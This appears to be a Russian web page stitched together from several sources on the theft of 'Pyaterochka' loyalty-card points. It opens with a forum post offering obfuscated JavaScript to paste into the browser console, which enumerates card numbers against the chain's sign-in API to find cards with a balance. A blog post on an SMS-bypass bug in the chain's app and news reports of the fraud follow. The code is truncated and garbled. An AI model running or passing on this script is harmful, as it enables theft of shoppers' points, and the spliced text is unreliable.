Что такое дампы пятерочки
Слив темы с картами пятерочки с балансом
RuRuAres
Флудер
Все до безумия просто.
Для этого нам понадобятся:
— Браузер Google chrome или любой другой
(Используя режим Инкогнито Chrome)
Справа от вас откроется окно, смотрим на его верхнюю часть и переходим в раздел ‘Console’ Вот фото как это делается http://prntscr.com/km0tnf
C_START_CODE = ‘778900422367’, //базовая часть карты, меняете последние 4 цифры
V_COUNTER = 1; // всегда равна 1, не трогать
var _0x625b=[«\x4D\x61\x64\x65\x20\x62\x79\x20\x40\x6D\x72\x44\x6F\x6F\x64\x65″,»\x6C\x6F\x67»], _0x1ff4=[«\x70\x61\x64″,»\x70\x72\x6F\x74\x6F\x74\x79\x70\x65″,»\x30″,»\x6C\x65\x6E\x67\x74\x68″,»\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\u0430\u0431\u0432\u0433\u0434\u0435\u0451\u0436\u0437\u0438\u0439\u043A\u043B\u043C\u043D\u043E\u043F\u0440\u0441\u0442\u0443\u0444\u0445\u0446\u0447\u0448\u0449\u044A\u044B\u044C\u044D\u044E\u044F\u0410\u0411\u0412\u0413\u0414\u0415\u0401\u0416\u0417\u0418\u0419\u041A\u041B\u041C\u041D\u041E\u041F\u0420\u0421\u0422\u0423\u0424\u0425\u0426\u0427\u0428\u0429\u042A\u042B\u042C\u042D\u042E\u042F\x21\x2C\x2E\x2D\x5F\x3D\x23\x24\x25\x5E\x26\x2A\x28\x29″,»»,»\x72\x61\x6E\x64\x6F\x6D»,»\x66\x6C\x6F\x6F\x72″,»\x63\x68\x61\x72\x41\x74″,»\x2F\x61\x70\x69\x2F\x76\x31\x2F\x61\x75\x74\x68\x2F\x73\x69\x67\x6E\x69\x6E»,»\x7B\x22\x6C\x6F\x67\x69\x6E\x22\x3A\x22″,»\x22\x2C\x22\x70\x61\x73\x73\x77\x6F\x72\x64\x22\x3A\x22″,»\x22\x2C\x22\x73\x63\x68\x65\x6D\x61\x22\x3A\x22\x62\x79\x2D\x63\x61\x72\x64\x22\x7D»,»\x50\x4F\x53\x54″,»\x6F\x70\x65\x6E»,»\x41\x63\x63\x65\x70\x74″,»\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x6A\x73\x6F\x6E\x2C\x20\x74\x65\x78\x74\x2F\x70\x6C\x61\x69\x6E\x2C\x20\x2A\x2F\x2A»,»\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72″,»\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65″,»\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x6A\x73\x6F\x6E\x3B\x63\x68\x61\x72\x73\x65\x74\x3D\x55\x54\x46\x2D\x38″,»\x58\x2D\x41\x75\x74\x68\x6F\x72\x69\x7A\x61\x74\x69\x6F\x6E»,»\x28\x3F\x3A\x5E\x7C\x3B\x20\x29″,»\x5C\x24\x31″,»\x72\x65\x70\x6C\x61\x63\x65″,»\x74\x6F\x6B\x65\x6E»,»\x3D\x28\x5B\x5E\x3B\x5D\x2A\x29″,»\x6D\x61\x74\x63\x68″,»\x63\x6F\x6F\x6B\x69\x65″,»\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65″,»\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65″,»\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74″,»\x70\x61\x72\x73\x65″,»\x73\x74\x61\x74\x75\x73″,»\x0A»,»\x6C\x6F\x67″,»\x73\x65\x6E\x64″];Number[_0x1ff4[1]][_0x1ff4[0]]= function(_0x3aebx1);_0x3aebxf[_0x1ff4[14]](_0x1ff4[13],_0x3aebx10,true);_0x3aebxf[_0x1ff4[17]](_0x1ff4[15],_0x1ff4[16]);_0x3aebxf[_0x1ff4[17]](_0x1ff4[18],_0x1ff4[19]);_0x3aebxf[_0x1ff4[17]](_0x1ff4[20],decodeURIComponent(document[_0x1ff4[27]][_0x1ff4[26]]( new RegExp(_0x1ff4[21]+ _0x1ff4[24][_0x1ff4[23]](/([\.$?*|<>\(\)\[\]\\\/\+^])/g,_0x1ff4[22])+ _0x1ff4[25]))[1]));_0x3aebxf[_0x1ff4[28]]= function()
Майнинг еды или «Пятерочка» глазами хакера
Введение
Немного о безопасности личных кабинетов
Как мы видим войти в личный кабинет можно используя номер телефона и пароль, но не всё так просто. После ввода данных появляется окно для ввода смс кода, который был отправлен на телефон владельца.
Казалось бы, как взломать такое? Перебрать код невозможно, есть лишь 3 попытки, а код четырёхзначный. Сразу отбрасываем данный вариант, но хакерам же как-то удаётся, значит и у нас получится!
Приложение «Пятерочка»
Как и у любого другого магазина с программой лояльности у сети магазинов «Пятерочка» есть своё приложение. Только вот приложение не простое, а со своими тараканами в коде. Давайте же разберёмся, что не так с приложением.
Вход в личный кабинет осуществляется так же с помощью номера телефона и пароля, а ещё сверху приходит смс подтверждение, но вот есть один интересный момент. Приложение «запоминает» учётную запись и при следующей попытке входа вместо смс кода на телефон отправляет пуш уведомление напрямую в приложение. Сейчас объясню поподробнее. Войдя впервые на свою учётную запись вам предстоит ввести код из смс для входа. Если вы по какой-то причине решили выйти и зайти снова, то во второй и последующие разы смс код вам приходить не будет, а вместо него в приложении будет само заполняться поле смс кода. Во диво! Сделано это конечно красиво, но есть один огромный недостаток. Замечен баг был мной в приложении «Пятерочка» версии 2.12.1, возможно есть и в других версиях. Что за баг и как его повторить?
Ниже вы можете лицезреть два видео, сняты они были не мной, но они очень наглядно показывают всю проблемы пуш уведомлений и бага приложения.
В первом видео видно, как хакер вводит данные для входа, после чего принимает смс на телефон и заходит в свой аккаунт. После чего выходит и проходит авторизацию снова. Во второй раз нам прекрасно видно, что никакая смс на телефон не приходит и поле для ввода автоматически заполняется пуш уведомлением.»
Во втором видео злоумышленник уже пытается войти в аккаунт не принадлежащий ему. Он вводит данные, но кода из смс он не знает по понятным причинам. Потом он убирает приложение из процессов и запускает его снова. На этом моменте прекрасно виден баг приложения. Открывается совершенно белое окно, после чего злоумышленник выходит из аккаунта. После чего вводит данные для входа повторно и о чудо, ему приходит пуш уведомление! Почему же такое произошло? Спросить надо у разработчиков приложения…
Методы решения
Лично я могу посоветовать разработчикам отключить пуш уведомления, что злоумышленники не могли взламывать аккаунты. Отключить конечно же на время до решения проблемы. Сам я не силён в разработке приложений и ничего дельного посоветовать не могу, но пуш уведомления они до сих пор не отключили.
Последствия
Из-за ошибки в коде страдают обычные люди, а именно добросовестные покупатели. Почитать гневные отзывы о том, что у людей украли баллы можно по ссылке: vk.com/topic-19098821_24191218. Ниже оставлю пару постов, на самом деле их намного больше, но думаю сейчас уже не смогу найти некоторые.
Проблема с воровством баллов очень актуальна и процветает это дело минимум год. Даже на пикабу можно найти посты.
Выводы
Не бывает идеальных приложений, но этот баг ужасен. Я не призываю вас преступать закон и особенно воровать что-то у кого-то! Пост был создан с целью исправить баг и достучаться до разработчиков приложения (письмо отправлял им больше месяца назад и результата ноль).
Всем добра и не допускайте таких ошибок в коде!»
«Афера века». Кто виноват в пропаже бонусных баллов «Пятёрочки»
Лайф рассказывает, как злоумышленники воруют баллы с бонусных «Выручай-карт» от «Пятёрочки». Там весь сок: взломы, воровство, банальное мошенничество и не только. Узнайте об уловках крохоборов и не попадайтесь на них.
Фото © ТАСС / Евгений Разумный
«Пятёрочка» — одна из самых больших розничных сетей в России. Разумеется, у неё есть программа лояльности — пластик «Выручай-карта». При его использовании люди получают кешбэк в виде баллов. Последними можно оплачивать товары.
«Выручай-карта» точно не лишняя, но, увы, не самая надёжная. В Интернете описана масса случаев, когда мошенники крали у людей разными способами баллы. Лайф рассказывает о самых известных схемах.
Ловкость рук и ничего более
К сожалению, угроза исходит даже от кассиров «Пятёрочки». Первый признак того, что вас хотят обмануть прямо в магазине, — округлившиеся глаза сотрудника предприятия при виде баланса на карте. Чем больше баллов, тем шире распахиваются глаза алчных кассиров.
Фото © ТАСС / Евгений Разумный
Что может произойти дальше? Например, сотрудник либо может уронить карту покупателя, либо любым другим способом скрыть её от глаз клиента. Пока посетитель «Пятёрочки» занят укладкой товаров в пакет, кассир кладёт карту клиента в карман, а возвращает ему пустую карту. До тех пор, пока покупатель не решит расплатиться баллами, он не узнает, что его обманули. А на это может уйти много времени. Баллы на «Выручай-карте» копятся медленно.
Мы не утверждаем, что подобные случаи — обычное правило для всех магазинов. Однако героиня этого рассказа именно так и лишилась своего пластика. По её словам, в первую очередь остаться без своей карты рискуют пожилые люди. Во-первых, именно они чаще всего пользуются физическими картами «Пятёрочки», а не их цифровыми копиями. Во-вторых, в силу физиологических особенностей человека к старости внимательность ослабевает.
Классика жанра: «Касса что-то зависла»
Ещё одну любопытную историю рассказала пользовательница сервиса irecommend под ником kristinka_malinka94. В главной роли — снова ушлый сотрудник магазина.
Фото © ТАСС / Егор Алеев
Схема следующая. Видя перед собой клиента с «Выручай-картой» и наличными в руках, продавец проводит картой по считывающему устройству, молча списывает баллы, а потом торжественно объявляет о зависании кассы. Клиент расплачивается наличными, получает сдачу из кармана сотрудника и уходит без чека. А в личном кабинете на сайте «Пятёрочки» обнаруживает, что ушёл он ещё и без баллов.
Что происходит, когда обманутый покупатель уходит? Пользовательница предполагает, что касса резко «отвисает». Баллами гасится большая часть покупки. Кассир добавляет недостающую сумму из наличных покупателя, а оставшиеся деньги оставляет себе.
Баллы и купоны за опрос от «Пятёрочки»
В начале года по Сети прокатилась волна жалоб на мошенников, которые от лица «Пятёрочки» призывали пройти незатейливый опрос и получить взамен либо купон, либо баллы на «Выручай-карту». Призывали посредством спам-рассылки на электронную почту с ссылками на подозрительные сайты. Суммы вознаграждения варьировались от сотен рублей до сотен тысяч.
Фото © ТАСС / Максим Коротченко
Получил ли кто-нибудь обещанное, не знаем. Но отзывы дают понять, что многие от опросов не только ничего не получили, но и понесли расходы. Ведь после их прохождения сайт с доменным именем вроде 5ka-dr.com просил за ссылку на купон или активатор баллов заплатить онлайн 100−150 рублей.
Разумеется, «Пятёрочку» здесь обвинять не в чем. Ну разве только в том, что она популярна и не предупредила пользователей о новом способе мошенничества. Хотя справедливости ради отметим, что иногда компания X5 Retail Group всё же реагирует на массовые мошеннические акции. Например, весной прошлого года компания открестилась от СМС-рассылки, которая обещала купон на 5000 рублей в честь дня рождения бренда. Для получения заветного бонуса нужно было лишь пройти по ссылке, которая дарила пользователям не купоны, а вирус для смартфонов.
Было ваше, стало наше
Пришло время поговорить непосредственно о «дырах» в самой системе лояльности. Одна из самых популярных жалоб на «Выручай-карту» посвящена таинственному исчезновению баллов. Мы нашли десятки прецедентов обнуления пластика. Что интересно, баллы в таких случаях списываются в несколько заходов и из разных точек России. Сегодня карта засветилась в Москве, завтра — в Белгородской области, послезавтра — в Перми и т.д.
Фото © ТАСС / Артём Геодакян
Так, у пользовательницы irecommend с ником hotlena2009 за пару недель увели 7810 баллов, что эквивалентно 781 руб. Юзер ФёдорAt лишился 135 цифровых наклеек, которые можно менять на акционную кухонную утварь. У kate_dale украли баллы на 350 руб. Marina-koti по воле мошенников лишилась 899 руб. Деньги ушли в Смоленск, тогда как сама она живёт в Нижегородской области.
X5 Retail Group, судя по тем же отзывам, реагирует на подобные жалобы неохотно. Сначала служба поддержки просит пять дней на рассмотрение заявки. Затем отправляет обманутого клиента в ближайшую «Пятёрочку» за новой картой с восстановленными баллами. А там его, как правило, встречает администратор, который, разумеется, знать ничего не знает про замену и разворачивает недовольного клиента. Последние два шага могут повторяться несколько раз. Побеждает тот, кто упрямее.
В комментарии Лайфу начальник управления по связям с общественностью компании X5 Retail Group Денис Кузнецов ответил, что «Пятёрочка» в курсе исчезновения баллов с бонусных карт клиентов. Он подтвердил, что «какое-то время назад к ним обращались с подобными жалобами «.
— Мы рассматриваем каждое отдельное обращение клиентов и принимаем решения исходя из результатов проведённой проверки. С учётом постоянного развития мошеннических схем компетентные службы компании непрерывно работают для их предотвращения, внося соответствующие доработки в систему, а также в режиме реального времени обнаруживают и оперативно устраняют уязвимости, — объяснил Денис Кузнецов.
Почему так происходит?
Хакеры, в отличие от программистов компании X5 Retail Group, не дремлют. Например, в мае этого года telegram-канал «Денежный» опубликовал скрипт для сайта «Пятёрочки», позволяющий привязывать активированные карты лояльности к любым номерам. Даже временным. Приложение «Пятёрочки» позволяет визуализировать штрихкод номера украденной карты. А для списания баллов на кассе только он и нужен.
X5 Retail Group, конечно, проблему тогда решила оперативно. Но на месте одной отрубленной головы выросли две новые. Во всяком случае, даже сегодня в Интернете без труда находятся продающиеся штрихкоды украденных карт с баллами. Курс плюс-минус везде одинаковый: 1 рубль на карте продают за 50 копеек. То есть карту с 5000 баллами можно купить за 250 рублей.
Каким именно эксплоитом хакеры пользуются для добычи штрихкодов сегодня, мы не знаем. Да и, в сущности, острой необходимости в этом знании нет. Поскольку в тёмных закоулках Интернета продают программы, которые автоматизируют добычу чужих карт с баллами.
В начале года за подобную софтину просили копейки — две-три тысячи рублей. Ещё дешевле услугу автовзлома магазинного пластика можно купить у ботов в «Телеграме». «Пятёрочка», к слову, не единственная сеть супермаркетов, карты лояльности которой взламываются.
Разумеется, не стоит расценивать информацию о существовании подобных систем как призыв к их использованию. Как минимум потому, что есть вполне легальный способ разжиться чужой картой «Пятёрочки» с баллами. Подробнее о нём мы рассказывали в этом материале.
Что такое дампы пятерочки
Возможно, мой материал не совсем соответствует тематике сайта, но в блогах присутствует много статей и новостей, еще более далеких. В данном же случае, речь пойдет о мошенничестве с использованием IT-технологий, поэтому считаю правомерным размещение данной статьи на сайте Overclockers.
реклама
Одна из крупнейших сетей продуктового ритейла в России столкнулась с фактами массового мошенничества с баллами по программам лояльности. Из-за дыр в системе безопасности, в последнее время воровство баллов с карт лояльности Пятерочки приняло массовый характер. Пострадали уже тысячи покупателей. Кроме того, мошенники стали создавать карты. накручивать на них баллы с помощью специальных эмуляторов и продавать их за 30-50 процентов от стоимости накрученных баллов.
Необходимо отметить, что за два месяца до этого X5 Retail Group ввела пакеты с подпиской, оплачивая которые можно получать дополнительно кешбэк 5% на все покупки и еще больший кешбэк по акциям, например, кешбэк 100% на один кофе или чай в день, кешбэк 20% на выпечку.
Также, ряду покупателей приходили персональные предложения в виде «целей». Мне, например, в октябре пришло предложение: совершите до 1 ноября покупок на общую сумму 10500 рублей и получите 10500 экспресс-баллов(то есть эквивалент 1050 рублей), а в ноябре «купите на 15500 рублей и получите 11800 баллов».
В их числе оказался и я. Мне магазин закрыл карту, на которой было накоплено 45620 обычных и экспресс-баллов, то есть в переводе на рубли это 4562 рубля. Вот скрин с мобильного приложения на момент когда карту заблокировали
После звонка на горячую линию и активации новой карты взамен заблокированной, как указано правилами программы лояльности, баллы и привилегии вместо того, чтобы перенестись на новую карту, просто исчезли.
Ниже привожу несколько скринов жалоб со страницы пятерочки в контакте от покупателей с такими же проблемами
Модераторы группы активно удаляют неугодные комментарии, а тех, кто наиболее активно выражает неудовольствие, просто вносят в черный список группы.
Техподдержка молчит, горячая линия ничего не знает.
После массового бана карт лояльности, 10 декабря в Пятерочке ввели новые правила, по которым оплатить баллами можно не более 50% от покупки.
Вот такие новогодние подарки от Пятерочки.
Кому интересно, может почитать комментарии здесь.
Пожизненная скидка в «Пятёрочке» и Nike. Как народ «взламывает» карты лояльности
Карты лояльности сегодня есть у всех. Но часто от них нет никакой пользы: мало баллов, а скидка настолько маленькая, что ради неё лень даже открывать кошелёк. Но Лайф узнал, как получить большую скидку и много баллов почти в любом магазине и за несколько минут. «Пятёрочка», «Перекрёсток», Adidas, Nike, «Рив Гош», «Л‘Этуаль» — все там. С удовольствием делимся этим лайфхаком.
Коллаж © LIFE. Фото © Shutterstock
Карты лояльности, они же бонусные, скидочные или дисконтные, уже давно соседствуют с банковским «пластиком» в кошельках и бумажниках россиян. По большей части они делятся на два типа: накопительные и скидочные. В первом случае магазин закрепляет за картой счёт, на который выводит кешбэк с покупок в виде баллов. Во втором — за картой закрепляется перманентная скидка. Сначала минимальная (в лучшем случае 5%), а потом максимальная (уже вполне ощутимые 20 или даже 30%).
Например, вездесущая «Пятёрочка» возвращает один балл с каждых потраченных 20 рублей. При этом балл эквивалентен не рублю, а всего десяти копейкам, то есть, чтобы получить один рубль кешбэка, нужно потратить 200 рублей. Аналогичная система работает в «Перекрёстке», «Карусели» и ряде других торговых сетей.
Примером скидочной карты пусть будет «пластик» из магазина косметики «Иль де Ботэ». Скидка начального уровня — 10%. Её можно «прокачать» до 15%, 20% и даже до 25%. Последняя — очень привлекательна. Но до неё непросто добраться. Ведь для VIP-статуса нужно закупиться товарами на 50 000 рублей. Наверняка найдутся те, кто готов отдать такие деньги за раз, но у большинства сумма будет копиться месяцами, если не годами. Похожая ситуация с магазином зоотоваров «Бетховен».
Большая часть лояльного «пластика» в наших кошельках по этой причине является если не бесполезной, то неэффективной. Но есть способы исправить ситуацию в лучшую сторону.